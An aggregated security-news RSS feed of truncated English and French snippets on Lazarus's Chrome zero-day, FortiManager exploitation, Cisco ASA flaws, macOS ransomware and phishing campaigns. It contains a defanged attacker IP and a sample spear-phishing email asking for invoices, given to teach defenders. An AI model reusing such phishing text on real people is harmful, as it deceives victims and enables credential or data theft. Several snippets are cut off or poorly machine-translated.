This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-12T11:33:43+00:00 www.secnews.physaphae.fr RiskIQ - cyber risk firms (now microsoft) 2024-10-25T16:15:13+00:00 https://community.riskiq.com/article/471a59d3 www.secnews.physaphae.fr/article.php?IdArticle=8601739 True Spam,Malware,Vulnerability,Threat,Studies,Mobile,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-25T16:11:10+00:00 https://community.riskiq.com/article/e831e4ae www.secnews.physaphae.fr/article.php?IdArticle=8601740 False Ransomware,Malware,Tool,Vulnerability,Threat APT 38 2.0000000000000000 HackRead - Chercher Cyber Fortinet and Mandiant investigated the mass exploitation of FortiManager devices via CVE-2024-47575, impacting 50+ systems across industries. Threat…]]> 2024-10-25T12:03:48+00:00 https://hackread.com/unc5820-exploits-fortimanager-zero-day-vulnerability/ www.secnews.physaphae.fr/article.php?IdArticle=8601677 False Vulnerability,Threat None 2.0000000000000000 ProofPoint - Cyber Firms 2024-10-25T10:37:05+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/making-the-switch-abnormal-to-proofpoint www.secnews.physaphae.fr/article.php?IdArticle=8601780 False Ransomware,Malware,Tool,Threat,Industrial,Cloud None 3.0000000000000000 ProjectZero - Blog de recherche Google In this example, Application.exe is a desktop program calling the documented RegCreateKeyEx function, which is exported by KernelBase.dll. The KernelBase.dll library implements RegCreateKeyEx by translating the high-level API parameters passed by the caller (paths, flags, etc.) to internal ones understood by the kernel. It then invokes the NtCreateKey system call through a thin wrapper provided by ntdll.dll, and the execution finally reaches the Windows kernel, where all of the actual work on the internal registry representation is performed. ]]> 2024-10-25T10:30:02+00:00 https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventure-4-hives.html www.secnews.physaphae.fr/article.php?IdArticle=8601741 False Tool,Vulnerability,Threat,Legislation,Technical APT 17 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine An unidentified threat actor has attempted to develop ransomware targeting macOS devices, posing as LockBit]]> 2024-10-25T08:00:00+00:00 https://www.infosecurity-magazine.com/news/macos-ransomware-attempts-leverage/ www.secnews.physaphae.fr/article.php?IdArticle=8601645 False Ransomware,Threat None 2.0000000000000000 Global Security Mag - Site de news francais Investigations]]> 2024-10-24T23:33:00+00:00 https://www.globalsecuritymag.fr/le-groupe-apt-lazarus-a-exploite-une-vulnerabilite-zero-day-dans-chrome-pour.html www.secnews.physaphae.fr/article.php?IdArticle=8602217 False Vulnerability,Threat APT 38 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-24T19:44:18+00:00 https://community.riskiq.com/article/d9d63acb www.secnews.physaphae.fr/article.php?IdArticle=8601602 True Ransomware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Préférences> Paramètres du panneau de configuration> Options de dossier. - Créer des paramètres pour les extensions de fichiers .jse et .js, en les associant à notepad.exe ou à un autre éditeur de texte. - Vérifiez votre pare-feu de périmètre et votre proxy pour empêcher les serveurs de créer des connexions arbitraires à Internet pour parcourir ou télécharger des fichiers.Ces restrictions aident à inhiber les téléchargements de logiciels malveillants et l'activité de commande et de contrôle (C2), y compris les appareils mobiles. - Encouragez les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge SmartScreen, qui identifie et bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites contenant des exploits et hébergent des logiciels malveillants.Allumez la protection du réseau pour bloquer les connexions aux domaines malveillants et aux adresses IP. - Installez uniquement les applications à partir de sources de confiance, telles que l'App Store officiel de la plate-forme logicielle \\.Les sources tierces peuvent avoir des normes laxistes pour les applications hébergées, ce qui facilite le téléchargement et la distribuer des logiciels malveillants. - Allumez [Protection en cloud-étirement] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antvirus?ocid=Magicti_TA_LearnDoc) et la soumission automatique de l'échantillon de l'échantillon automatiquesur [Microsoft Defender Antivirus](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/deploy-microsoft-defender-antivirus? Ocid = magicti_ta_learndoc).Ces capacités utilisent l'intelligence artificielle et l'apprentissage automatique pour identifier et arrêter rapidement les menaces nouvelles et inconnues. - Exécutez la [dernière version de vos systèmes d'exploitation] (https://support.microsoft.com/windo]]> 2024-10-24T19:05:47+00:00 https://community.riskiq.com/article/055c91ec www.secnews.physaphae.fr/article.php?IdArticle=8601603 False Spam,Malware,Tool,Vulnerability,Threat,Mobile None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cisco on Wednesday said it has released updates to address an actively exploited security flaw in its Adaptive Security Appliance (ASA) that could lead to a denial-of-service (DoS) condition. The vulnerability, tracked as CVE-2024-20481 (CVSS score: 5.8), affects the Remote Access VPN (RAVPN) service of Cisco ASA and Cisco Firepower Threat Defense (FTD) Software. Arising due to resource]]> 2024-10-24T18:11:00+00:00 https://thehackernews.com/2024/10/cisco-issues-urgent-fix-for-asa-and-ftd.html www.secnews.physaphae.fr/article.php?IdArticle=8601547 False Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-24T18:07:45+00:00 https://community.riskiq.com/article/7aaa2cae www.secnews.physaphae.fr/article.php?IdArticle=8601595 False Vulnerability,Threat,Studies None 3.0000000000000000 HackRead - Chercher Cyber North Korean hackers from Lazarus Group exploited a zero-day vulnerability in Google Chrome to target cryptocurrency investors with…]]> 2024-10-24T17:38:25+00:00 https://hackread.com/north-korean-hackers-crypto-deceptive-game-zero-day-exploit/ www.secnews.physaphae.fr/article.php?IdArticle=8601586 False Vulnerability,Threat APT 38 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-24T16:59:26+00:00 https://community.riskiq.com/article/db27b5bb www.secnews.physaphae.fr/article.php?IdArticle=8601581 False Ransomware,Malware,Tool,Threat None 3.0000000000000000 CybeReason - Vendor blog ]]> 2024-10-24T16:00:44+00:00 https://www.cybereason.com/blog/unlocking-the-potential-of-ai-in-cybersecurity-embracing-the-future-and-its-complexities www.secnews.physaphae.fr/article.php?IdArticle=8601584 False Tool,Threat None 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Lazarus Group exploited Google Chrome zero-day, infecting systems with Manuscrypt malware]]> 2024-10-24T16:00:00+00:00 https://www.infosecurity-magazine.com/news/lazarus-group-exploits-google/ www.secnews.physaphae.fr/article.php?IdArticle=8601571 False Malware,Vulnerability,Threat APT 38 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices. Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor. This entails triggering the]]> 2024-10-24T15:23:00+00:00 https://thehackernews.com/2024/10/lazarus-group-exploits-google-chrome.html www.secnews.physaphae.fr/article.php?IdArticle=8601531 False Vulnerability,Threat APT 38 2.0000000000000000 Dark Reading - Informationweek Branch Unauthenticated threat actors can remotely cause a denial-of-service (DoS) cyberattack within the Remote Access VPN software in Cisco\'s ASA and Firepower software.]]> 2024-10-24T15:18:54+00:00 https://www.darkreading.com/application-security/cisco-asa-ftd-software-active-vpn-exploitation www.secnews.physaphae.fr/article.php?IdArticle=8601568 False Threat None 3.0000000000000000 SentinelOne (Research) - Cyber Firms Learn about cloud threats, how to hunt for them and how to analyze them in this post based on Alex Delamotte\'s recent LABScon workshop.]]> 2024-10-24T15:17:35+00:00 https://www.sentinelone.com/labs/cloud-malware-a-threat-hunters-guide-to-analysis-techniques-and-delivery/ www.secnews.physaphae.fr/article.php?IdArticle=8601565 False Malware,Threat,Cloud None 2.0000000000000000 Bleeping Computer - Magazine Américain Cisco fixed a denial of service flaw in its Cisco ASA and Firepower Threat Defense (FTD) software, which was discovered during large-scale brute force attacks against Cisco VPN devices in April. [...]]]> 2024-10-24T14:06:30+00:00 https://www.bleepingcomputer.com/news/security/cisco-fixes-vpn-dos-flaw-discovered-in-password-spray-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8601592 False Threat None 3.0000000000000000 SecurityWeek - Security News Le Lazarus APT a créé un site Web trompeur qui a exploité un chrome zéro-jour pour installer des logiciels malveillants et voler la crypto-monnaie.

---

>The Lazarus APT created a deceptive website that exploited a Chrome zero-day to install malware and steal cryptocurrency. ]]> 2024-10-24T13:02:10+00:00 https://www.securityweek.com/north-korean-hackers-exploited-chrome-zero-day-for-cryptocurrency-theft/ www.secnews.physaphae.fr/article.php?IdArticle=8601542 False Malware,Vulnerability,Threat APT 38 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine This high-severity flaw, dubbed FortiJump by security researcher Kevin Beaumont, has been added to CISA\'s KEV catalog]]> 2024-10-24T10:45:00+00:00 https://www.infosecurity-magazine.com/news/fortinet-exploitation-fortimanager/ www.secnews.physaphae.fr/article.php?IdArticle=8601535 False Vulnerability,Threat None 3.0000000000000000 The State of Security - Magazine Américain Historically, Mac users haven\'t had to worry about malware as much as their Windows-using cousins. Although malware targeting Apple devices actually predates viruses written for PCs, and there have been some families of malware that have presented a significant threat for both operating systems (for instance, the Word macro viruses that hit computers hard from 1995 onwards), it is generally the case that you\'re simply a lot less likely to encounter malware on your Mac than you are on your Windows PC. But that doesn\'t mean that Mac users should be complacent. And the recent discovery of a new...]]> 2024-10-24T10:11:51+00:00 https://www.tripwire.com/state-of-security/notlockbit-rransomware-discovery-serves-wake-call-mac-users www.secnews.physaphae.fr/article.php?IdArticle=8601566 False Ransomware,Malware,Threat None 3.0000000000000000 UnderNews - Site de news "pirate" francais L’IA apporte de nombreux avantages, mais les cybercriminels utilisent aussi cette technologie à des fins malveillantes, pour augmenter le volume et la vitesse des attaques qu’ils déploient, ou pour créer des menaces plus crédibles. Tribune Fortinet – Les organisations du monde entier s’en rendent bien compte et les dirigeants mettent en œuvre des initiatives pour […] The post Avec l'essor de l'IA, toutes organisations devraient adopter ces cinq mesures pour se prémunir face aux risques cyber first appeared on UnderNews.]]> 2024-10-24T09:38:07+00:00 https://www.undernews.fr/reseau-securite/avec-lessor-de-lia-toutes-organisations-devraient-adopter-ces-cinq-mesures-pour-se-premunir-face-aux-risques-cyber.html www.secnews.physaphae.fr/article.php?IdArticle=8601534 False Threat None 3.0000000000000000 The Register - Site journalistique Anglais Don\'t ignore this nasty zero day exploit says TAG A nasty bug in Samsung\'s mobile chips is being exploited by miscreants as part of an exploit chain to escalate privileges and then remotely execute arbitrary code, according to Google security researchers.…]]> 2024-10-24T00:16:09+00:00 https://go.theregister.com/feed/www.theregister.com/2024/10/24/samsung_phone_eop_attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8601501 False Threat,Mobile None 4.0000000000000000 Dark Reading - Informationweek Branch The North Korean actor is going after cryptocurrency investors worldwide leveraging a genuine-looking game site and AI-generated content and images.]]> 2024-10-23T20:55:13+00:00 https://www.darkreading.com/cyberattacks-data-breaches/lazarus-group-exploits-chrome-zero-day-campaign www.secnews.physaphae.fr/article.php?IdArticle=8601480 False Vulnerability,Threat APT 38 2.0000000000000000 Mandiant - Blog Sécu de Mandiant Summary In October 2024, Mandiant collaborated with Fortinet to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised FortiManager devices in various industries. The vulnerability, CVE-2024-47575 / FG-IR-24-423, allows a threat actor to use an unauthorized, threat actor-controlled FortiManager device to execute arbitrary code or commands against vulnerable FortiManager devices.  Mandiant observed a new threat cluster we now track as UNC5820 exploiting the FortiManager vulnerability as early as June 27, 2024. UNC5820 staged and exfiltrated the configuration data of the FortiGate devices managed by the exploited FortiManager. This data contains detailed configuration information of the managed appliances as well as the users and their FortiOS256-hashed passwords. This data could be used by UNC5820 to further compromise the FortiManager, move laterally to the managed Fortinet devices, and ultimately target the enterprise environment. At this time, the data sources analyzed by Mandiant did not record the specific requests that the threat actor used to leverage the FortiManager vulnerability. Additionally, at this stage of our investigations there is no evidence that UNC5820 leveraged the obtained configuration data to move laterally and further compromise the environment. As a result, at the time of publishing, we lack sufficient data to assess actor motivation or location. As additional information becomes available through our investigations, Mandiant will update this blog\'s attribution assessment. Organizations that may have their FortiManager exposed to the internet should conduct a forensic investigation immediately. Exploitation Details Mandiant\'s earliest observed exploitation attempt occurred on June 27, 2024. On that day, a FortiManager device received inbound connections from the IP address 45[.]32[.]41[.]202 on the default port TCP/541. At approximately the same time, the file system recorded the staging of various Fortinet configuration files in a Gzip-compressed archive named /tmp/.tm. This archive contained the files and folders as listed in Table 1. ]]> 2024-10-23T20:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575/ www.secnews.physaphae.fr/article.php?IdArticle=8601490 False Vulnerability,Threat,Cloud None 3.0000000000000000 Dark Reading - Informationweek Branch The risk of exploitation is heightened, thanks to a proof-of-concept that\'s been made publicly available.]]> 2024-10-23T19:34:30+00:00 https://www.darkreading.com/vulnerabilities-threats/microsoft-sharepoint-vuln-active-exploit www.secnews.physaphae.fr/article.php?IdArticle=8601469 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-23T16:34:48+00:00 https://community.riskiq.com/article/7c0b1160 www.secnews.physaphae.fr/article.php?IdArticle=8601330 False Vulnerability,Threat APT 28 3.0000000000000000 Dark Reading - Informationweek Branch Popular titles on both Google Play and Apple\'s App Store include hardcoded and unencrypted AWS and Azure credentials in their codebases or binaries, making them vulnerable to misuse by threat actors.]]> 2024-10-23T15:44:38+00:00 https://www.darkreading.com/cloud-security/mobile-apps-millions-downloads-expose-cloud-credentials www.secnews.physaphae.fr/article.php?IdArticle=8601407 False Threat,Mobile,Cloud None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat actors have been observed abusing Amazon S3 (Simple Storage Service) Transfer Acceleration feature as part of ransomware attacks designed to exfiltrate victim data and upload them to S3 buckets under their control. "Attempts were made to disguise the Golang ransomware as the notorious LockBit ransomware," Trend Micro researchers Jaromir Horejsi and Nitesh Surana said. "However, such is]]> 2024-10-23T15:00:00+00:00 https://thehackernews.com/2024/10/ransomware-gangs-use-lockbits-fame-to.html www.secnews.physaphae.fr/article.php?IdArticle=8601393 False Ransomware,Threat,Prediction None 2.0000000000000000 UnderNews - Site de news "pirate" francais L’équipe du Threat Labs de Netskope a récemment découvert ce qui semble être une nouvelle chaîne d’attaques menant à l’infection par le malware Bumblebee, et leurs conclusions corroborent celles d’autres chercheurs. Tribune – Bumblebee est un malware très sophistiqué que les cybercriminels utilisent pour accéder aux réseaux d’entreprise et diffuser d’autres charges utiles telles que […] The post Recherche Netskope Threat Labs – Le retour du malware Bumblebee first appeared on UnderNews.]]> 2024-10-23T13:28:04+00:00 https://www.undernews.fr/malwares-virus-antivirus/recherche-netskope-threat-labs-le-retour-du-malware-bumblebee.html www.secnews.physaphae.fr/article.php?IdArticle=8601351 False Malware,Threat None 2.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Résumé De avril à septembre 2024, les laboratoires de menace de Netskope ont suivi une augmentation de 10 fois le trafic vers les pages de phishing conçues via Webflow.Les campagnes ciblent les informations sensibles de différents portefeuilles cryptographiques, notamment Coinbase, Metamask, Phantom, Trezor et BitBuy, ainsi que les informations d'identification de connexion pour plusieurs plates-formes Webmail de l'entreprise, ainsi que les informations d'identification de connexion Microsoft365.Les campagnes [& # 8230;]

---

>Summary From April to September 2024, Netskope Threat Labs tracked a 10-fold increase in traffic to phishing pages crafted through Webflow. The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for multiple company webmail platforms, as well as Microsoft365 login credentials. The campaigns […] ]]> 2024-10-23T13:00:00+00:00 https://www.netskope.com/blog/attackers-target-crypto-wallets-using-codeless-webflow-phishing-pages www.secnews.physaphae.fr/article.php?IdArticle=8601444 False Threat None 3.0000000000000000 Kaspersky - Kaspersky Research blog Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.]]> 2024-10-23T11:00:48+00:00 https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/ www.secnews.physaphae.fr/article.php?IdArticle=8601458 False Vulnerability,Threat APT 38 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine The US government has issued guidance for federal agencies on the use of Traffic Light Protocol, designed to boost intelligence sharing with the cybersecurity community]]> 2024-10-23T10:30:00+00:00 https://www.infosecurity-magazine.com/news/us-government-threat-sharing-tlp/ www.secnews.physaphae.fr/article.php?IdArticle=8601375 False Threat None 3.0000000000000000 The State of Security - Magazine Américain DDoS attacks have become an annoyance most companies assume they may have to deal with at some point. While frustrating, minor website disruptions from small-scale hacktivist campaigns rarely create substantial business impacts. However, a particularly insidious DDoS spinoff has emerged over the past decade – one aimed at blackmail. This evolutionary milestone stems from what\'s called Ransom DDoS (RDDoS), likely one of the most outrageous cybercrime weapons targeting businesses globally since 2015. With this form of extortion, threat actors aim to swamp an organization\'s infrastructure with...]]> 2024-10-23T05:17:08+00:00 https://www.tripwire.com/state-of-security/defending-against-ransom-ddos-attacks www.secnews.physaphae.fr/article.php?IdArticle=8601368 False Threat None 3.0000000000000000 TrendMicro - Security Firm Blog How does Prometei insidiously operate in a compromised system? This Managed Extended Detection and Response investigation conducted with the help of Trend Vision One provides a comprehensive analysis of the inner workings of this botnet so users can stop the threat in its tracks before it inflicts damage to the system.]]> 2024-10-23T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html www.secnews.physaphae.fr/article.php?IdArticle=8601347 False Threat,Prediction None 3.0000000000000000 Dark Reading - Informationweek Branch If it\'s exploited, bad actors can execute arbitrary code while evading detection thanks to a renamed process.]]> 2024-10-22T21:39:33+00:00 https://www.darkreading.com/endpoint-security/samsung-zero-day-vuln-under-active-exploit-google-warns www.secnews.physaphae.fr/article.php?IdArticle=8601410 False Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-22T21:29:09+00:00 https://community.riskiq.com/article/8e450441 www.secnews.physaphae.fr/article.php?IdArticle=8601327 True Ransomware,Spam,Malware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Bad actors have been observed targeting Docker remote API servers to deploy the SRBMiner crypto miner on compromised instances, according to new findings from Trend Micro. "In this attack, the threat actor used the gRPC protocol over h2c to evade security solutions and execute their crypto mining operations on the Docker host," researchers Abdelrahman Esmail and Sunil Bharti said in a technical]]> 2024-10-22T19:30:00+00:00 https://thehackernews.com/2024/10/cybercriminals-exploiting-docker-api.html www.secnews.physaphae.fr/article.php?IdArticle=8601396 False Threat,Prediction,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-22T17:52:36+00:00 https://community.riskiq.com/article/a955e4eb www.secnews.physaphae.fr/article.php?IdArticle=8601325 False Ransomware,Malware,Tool,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-22T16:33:17+00:00 https://community.riskiq.com/article/252d9789 www.secnews.physaphae.fr/article.php?IdArticle=8601324 False Ransomware,Malware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-22T15:57:30+00:00 https://community.riskiq.com/article/cac6b305 www.secnews.physaphae.fr/article.php?IdArticle=8601322 False Ransomware,Spam,Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-22T15:22:52+00:00 https://community.riskiq.com/article/5ce577b3 www.secnews.physaphae.fr/article.php?IdArticle=8601323 False Vulnerability,Threat,Prediction,Cloud None 3.0000000000000000 Global Security Mag - Site de news francais Business News

---

Stream.Security Secures $30 Million in Series B Funding Breakthrough Cloud Twin Model Powers the Only Real Time Cloud Threat & Exposure Detection and Response Solution that SecOps Teams Can Trust - Business News]]> 2024-10-22T14:10:41+00:00 https://www.globalsecuritymag.fr/stream-security-secures-30-million-in-series-b-funding.html www.secnews.physaphae.fr/article.php?IdArticle=8601443 False Threat,Cloud None 2.0000000000000000 Bleeping Computer - Magazine Américain Proof-of-concept exploit code is now public for a vulnerability in Microsoft\'s Remote Registry client that could be used to take control of a Windows domain by downgrading the security of the authentication process. [...]]]> 2024-10-22T13:26:01+00:00 https://www.bleepingcomputer.com/news/security/exploit-released-for-new-windows-server-winreg-ntlm-relay-attack/ www.secnews.physaphae.fr/article.php?IdArticle=8601361 False Threat None 3.0000000000000000 Zataz - Magazine Francais de secu 2024-10-22T13:05:12+00:00 https://www.zataz.com/pour-proteger-active-directory-neutralisez-les-menaces-liees-a-labus-et-a-lelevation-des-privileges/ www.secnews.physaphae.fr/article.php?IdArticle=8601309 False Ransomware,Threat None 2.0000000000000000 Fortinet - Fabricant Materiel Securite A power grid operator has deployed a Fortinet SecOps solution to protect against zero-day attacks, converge IT/OT security, and centralize system management.]]> 2024-10-22T13:00:00+00:00 https://www.fortinet.com/blog/customer-stories/managing-security-operations-in-a-complex-environment www.secnews.physaphae.fr/article.php?IdArticle=8601314 False Vulnerability,Threat,Industrial None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical security flaw impacting ScienceLogic SL1 to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation as a zero-day. The vulnerability in question, tracked as CVE-2024-9537 (CVSS v4 score: 9.3), refers to a bug involving an unspecified third-party component that could]]> 2024-10-22T10:17:00+00:00 https://thehackernews.com/2024/10/cisa-adds-sciencelogic-sl1.html www.secnews.physaphae.fr/article.php?IdArticle=8601268 False Vulnerability,Threat None 2.0000000000000000 Global Security Mag - Site de news francais Rapports spéciaux

---

Disastrous cyberattacks show organisations need to be more proactive in defence, says Oxylabs Threat intelligence can help identify a threat actor\'s motives, targets, and behaviour, all while isolating threats before causing harm. - Special Reports]]> 2024-10-22T09:59:06+00:00 https://www.globalsecuritymag.fr/disastrous-cyberattacks-show-organisations-need-to-be-more-proactive-in-defence.html www.secnews.physaphae.fr/article.php?IdArticle=8601289 False Threat None 2.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique L'une des conclusions les plus intéressantes de notre rapport de NetSkope Threat Labs: Insurance 2024 a été la découverte que Github est l'application la plus populaire en termes de téléchargements de logiciels malveillants pour ce Microsoft Onedrive vertical spécifique, qui est généralement le leader incontestable de cette carte imputable.Une confirmation intéressante de cette tendance particulière du [& # 8230;]

---

>One of the most interesting findings of our Netskope Threat Labs Report: Insurance 2024 was the discovery that GitHub is the most popular application in terms of malware downloads for this specific vertical, surpassing Microsoft OneDrive, which is usually the undisputed leader of this unwelcome chart. An interesting confirmation of this peculiar trend of the […] ]]> 2024-10-21T20:57:28+00:00 https://www.netskope.com/blog/github-comments-from-legitimate-repositories-exploited-to-deliver-remcos-rat www.secnews.physaphae.fr/article.php?IdArticle=8601176 False Malware,Threat,Prediction None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-21T20:43:52+00:00 https://community.riskiq.com/article/f4c57994 www.secnews.physaphae.fr/article.php?IdArticle=8601196 False Ransomware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-21T18:59:55+00:00 https://community.riskiq.com/article/16d42825 www.secnews.physaphae.fr/article.php?IdArticle=8601155 False Ransomware,Tool,Threat Guam 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-21T18:57:24+00:00 https://community.riskiq.com/article/b382c0b6 www.secnews.physaphae.fr/article.php?IdArticle=8601156 False Ransomware,Spam,Malware,Tool,Threat,Legislation ChatGPT 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-21T17:57:04+00:00 https://community.riskiq.com/article/3b8a71a8 www.secnews.physaphae.fr/article.php?IdArticle=8601136 False Ransomware,Malware,Tool,Threat,Medical None 2.0000000000000000 Zimperium - cyber risk firms for mobile Dans ce billet de blog, nous partageons la protection de Zimperium \\ contre la campagne de lance de lance Makara. .

---

>In this blog post we share Zimperium\'s Zero-Day Protection against the Water Makara Spear-Phishing campaign. ]]> 2024-10-21T17:48:26+00:00 https://www.zimperium.com/blog/zimperiums-zero-day-protection-against-water-makara-spear-phishing-campaign/ www.secnews.physaphae.fr/article.php?IdArticle=8601116 False Vulnerability,Threat None 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine A threat actor claimed to get hold of an exposed GitLab configuration file containing Zendesk API access tokens]]> 2024-10-21T15:30:00+00:00 https://www.infosecurity-magazine.com/news/stolen-tokens-internet-archive/ www.secnews.physaphae.fr/article.php?IdArticle=8601078 False Threat None 2.0000000000000000 The Register - Site journalistique Anglais Like keeping your camera and microphone private? Patch up In revealing details about a vulnerability that threatens the privacy of Apple fans, Microsoft urges all macOS users to update their systems.…]]> 2024-10-21T13:32:08+00:00 https://go.theregister.com/feed/www.theregister.com/2024/10/21/microsoft_macos_hm_surf/ www.secnews.physaphae.fr/article.php?IdArticle=8601013 False Malware,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-10-21T11:41:26+00:00 https://community.riskiq.com/article/02320e34 www.secnews.physaphae.fr/article.php?IdArticle=8600983 False Ransomware,Malware,Tool,Vulnerability,Threat,Cloud APT 38,APT 37,APT-C-17 2.0000000000000000 Checkpoint Research - Fabricant Materiel Securite Pour les dernières découvertes en cyber recherche pour la semaine du 21 octobre, veuillez télécharger notre bulletin de renseignement sur les menaces.Les principales attaques et violations des médecins de la santé des enfants de Boston, qui font partie du réseau hospitalier de Boston Children \\, ont subi une violation de données en septembre, exposant des informations sensibles aux patients, y compris les numéros de sécurité sociale, les dossiers médicaux et les détails de l'assurance maladie.Le [& # 8230;]

---

>For the latest discoveries in cyber research for the week of 21st October, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Boston Children\'s Health Physicians, part of the Boston Children\'s Hospital network, suffered a data breach in September, exposing sensitive patient information, including Social Security numbers, medical records, and health insurance details. The […] ]]> 2024-10-21T10:13:48+00:00 https://research.checkpoint.com/2024/21st-october-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8600946 False Data Breach,Threat,Medical None 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC phishing attacks that many of us have become accustomed to. That way, you can recognize and resist spear phishing attempts that leverage psychological triggers against you. Anatomy of a Spear Phishing Hoax Before analyzing the specifics of social engineering, let’s level set on what defines a spear phishing attack. Highly targeted: Spear phishing targets specific individuals or organizations using personalization and context to improve credibility. This could be titles, familiar signatures, company details, projects worked on, etc. Appears legitimate: Spear phishers invest time in making emails and landing pages appear 100% authentic. They’ll often use real logos, domains, and stolen data. Seeks sensitive data: The end goal is to get victims to give away credentials, bank details, trade secrets, or other sensitive information or to install malware. Instills a sense of urgency/fear: Subject lines and content press emotional triggers related to urgency, curiosity, fear, and doubt to get quick clicks without deeper thought. With that foundation set, let’s examine how spear phishers socially engineer their attacks to exploit human vulnerabilities with frightening success. #1: They Leverage the Human Desire to Be Helpful Human beings have an innate desire to be perceived as helpful. When someone asks you for a favor, your first instinct is likely wanting to say yes rather than second-guess them. Spear phishers exploit this trait by crafting emails that make requests sound reasonable and essential. Even just starting an email with “I hope you can help me with...” triggers reciprocity bias that increases vulnerability to attack. Let’s take a look at an example: Subject: URGENT Support Needed Email Body: “Hi Amanda, I’m reaching out because I need your help, please. I’m currently out of office and having issues accessing invoices. Do you mind sending me over the 2 most recent invoices we received? I need to send them out by end of day. Sorry for the urgent request! Please let me know. Thanks, Sarah”. This email pulls together four highly effective social engineering triggers: Politeness – Saying “please” and “thank you” fits social norms for seeking help. Sense of urgency – Creating a short deadline pressures quick action without deeper thought. ]]> 2024-10-21T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/a-look-at-the-social-engineering-element-of-spear-phishing-attacks www.secnews.physaphae.fr/article.php?IdArticle=8601075 False Spam,Malware,Vulnerability,Threat,Cloud,Technical None 2.0000000000000000 Dark Reading - Informationweek Branch The "Code-on-Toast" supply chain cyberattacks by APT37 delivered data-stealing malware to users in South Korea who had enabled Toast pop-up ads.]]> 2024-10-21T01:00:00+00:00 https://www.darkreading.com/vulnerabilities-threats/dprk-microsoft-zero-day-no-click-toast-attacks www.secnews.physaphae.fr/article.php?IdArticle=8600761 False Malware,Vulnerability,Threat APT 37 2.0000000000000000 TrendLabs Security - Editeur Antivirus We observed an unknown threat actor abusing exposed Docker remote API servers to deploy the perfctl malware.]]> 2024-10-21T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/j/attackers-target-exposed-docker-remote-api-servers-with-perfctl-.html www.secnews.physaphae.fr/article.php?IdArticle=8601042 False Malware,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials. Russian cybersecurity company Positive Technologies said it discovered last month that an email was sent to an unspecified governmental organization located in one of the Commonwealth of]]> 2024-10-20T13:07:00+00:00 https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html www.secnews.physaphae.fr/article.php?IdArticle=8600499 False Vulnerability,Threat None 2.0000000000000000 Global Security Mag - Site de news francais Investigations]]> 2024-10-19T19:51:10+00:00 https://www.globalsecuritymag.fr/les-attaques-par-ransomware-diminuent-mais-la-recuperation-apres-l-attaque.html 